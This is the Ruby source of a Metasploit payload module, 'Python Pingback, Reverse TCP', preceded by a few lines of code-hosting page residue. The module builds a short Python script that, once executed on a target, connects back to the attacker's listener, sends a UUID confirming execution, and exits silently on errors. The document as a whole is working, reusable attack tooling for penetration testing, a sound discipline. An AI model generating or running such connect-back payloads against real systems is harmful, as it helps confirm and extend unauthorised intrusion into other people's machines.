Adam Cammack
48 lines
1.2 KiB
Ruby
48 lines
1.2 KiB
Ruby
require 'msf/core/handler/reverse_tcp'
|
|
require 'msf/core/payload/python'
|
|
|
|
require 'msf/base/sessions/pingback'
|
|
require 'msf/core/payload/pingback'
|
|
|
|
module MetasploitModule
|
|
|
|
CachedSize = 193
|
|
|
|
include Msf::Payload::Single
|
|
include Msf::Payload::Pingback
|
|
include Msf::Payload::Pingback::Options
|
|
|
|
def initialize(info = {})
|
|
super(merge_info(info,
|
|
'Name' => 'Python Pingback, Reverse TCP (via python)',
|
|
'Description' => 'Connects back to the attacker, sends a UUID, then terminates',
|
|
'Author' => 'asoto-r7',
|
|
'License' => MSF_LICENSE,
|
|
'Platform' => 'python',
|
|
'Arch' => ARCH_PYTHON,
|
|
'Handler' => Msf::Handler::ReverseTcp,
|
|
'Session' => Msf::Sessions::Pingback,
|
|
'PayloadType' => 'python'
|
|
))
|
|
end
|
|
|
|
def generate
|
|
super.to_s + command_string
|
|
end
|
|
|
|
def command_string
|
|
self.pingback_uuid ||= self.generate_pingback_uuid
|
|
cmd = <<~PYTHON
|
|
import binascii as b
|
|
import socket as s
|
|
o=s.socket(s.AF_INET,s.SOCK_STREAM)
|
|
try:
|
|
o.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
|
|
o.send(b.a2b_base64('#{[[self.pingback_uuid].pack('H*')].pack('m0')}'))
|
|
o.close()
|
|
except:
|
|
pass
|
|
PYTHON
|
|
end
|
|
end
|